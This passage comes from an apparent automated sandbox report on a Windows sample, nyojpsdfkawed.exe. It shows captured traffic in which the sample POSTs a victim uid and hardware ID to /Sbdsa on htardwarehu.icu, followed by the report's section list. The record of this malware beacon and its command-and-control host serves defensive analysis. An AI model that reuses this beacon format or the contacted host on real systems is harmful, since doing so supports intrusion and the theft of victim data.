2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: d7 13 af fe 14 e7 51 18 a2 b8 04 d1 39 03 08 50 c1 3c 1c 77 7a cd a7 aa 46 6b 71 12 ac 09 77 c3 95 5f d7 14 56 c7 6e c3 e2 02 b4 2f db 45 67 0c bc 2d ad 27 62 a0 07 2d 9f a1 73 65 b0 0b 02 5b ce 17 e7 11 f7 c7 0e e0 b3 cb e7 a9 c8 8b aa db 49 d1 f3 a3 56 cf 76 3d c0 dc 95 67 ee 05 25 00 b7 32 a8 2e d2 2e 67 dc 69 f6 87 d6 58 6a 6e c4 37 43 12 1f 68 79 74 f6 24 5f 69 d5 48 9a a8 0a 6e 49 d0 9c 58 6f 4a c3 f0 a6 a4 1b d6 d5 63 30 9d cc 44 39 a1 e3 78 23 a8 a1 d6 34 1d 0f 24 ed 2d d9 ed 0c 4b 5f 9e 41 17 58 0b fd 9c 89 a7 b4 45 f7 c3 0d 43 78 d1 ed 65 43 c1 44 fc 5b 9d e0 20 8f 30 e6 a2 0b 9e 30 0d 2c 11 32 9a 0b 47 67 ea e6 38 cc 4f 49 9a 5e c9 ac dd 73 af cd d0 b2 37 51 ed ec 54 6b 51 5f 12 f7 21 bd 6c 71 c4 7c d3 0d df 7c 01 e7 6d 5d 61 9c 1a b2 99 51 6f Data Ascii: Q9P<wzFkqw_Vn/Eg-'b-se[IVv=g%2..giXjn7Chyt$_iHnIXoJc0D9x#4$-K_AXECxeCD[ 00,2Gg8OI^s7QTkQ_!lq\|\|m]aQo
2025-03-13 13:52:48 UTC	834	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGwiyniCu5dusp5%2BrGhkA5PXUtnLxAVR%2FMT9uPr0R3n9CIuqcBOw6GWuFRAW9%2FhaEFsa8xkE%2BS%2F3srTIdomcZeMWDIXLq%2B07ftao%2F%2BXaP5RsCXXFweSyL%2FFPLqz4Qxmi8Ks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc037e5ba2efbc-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18018&min_rtt=13226&rtt_var=8020&sent=196&recv=439&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573303&delivery_rate=218863&cwnd=233&unsent_bytes=0&cid=bb86f1dc12fceced&ts=2851&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49689	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:49 UTC	265	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 79 Host: htardwarehu.icu
2025-03-13 13:52:49 UTC	79	OUT	Data Raw: 75 69 64 3d 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 26 63 69 64 3d 26 68 77 69 64 3d 41 45 41 34 32 41 32 43 36 36 46 31 37 45 44 32 31 37 33 35 37 41 32 33 32 30 41 46 33 35 43 37 Data Ascii: uid=b45c944451c74b1242b75a37cba017d3&cid=&hwid=AEA42A2C66F17ED217357A2320AF35C7
2025-03-13 13:52:50 UTC	781	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:50 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmlj8b18imbeo6kfiA1sWRA%2B40UpDgKKPItaOrLj8q3u2rPG8r4u%2FokZbgvQ4w9aItcJymTjlpqZYW9S%2FGnQ2g0cWBmzztj6TrW8KdoMHQjbmorpPvzqJ6JsuMc6izzcROY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc03997b54066c-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18795&min_rtt=15591&rtt_var=7259&sent=5&recv=7&lost=0&retrans=0&

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nyojpsdfkawed.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
nyojpsdfkawed.exe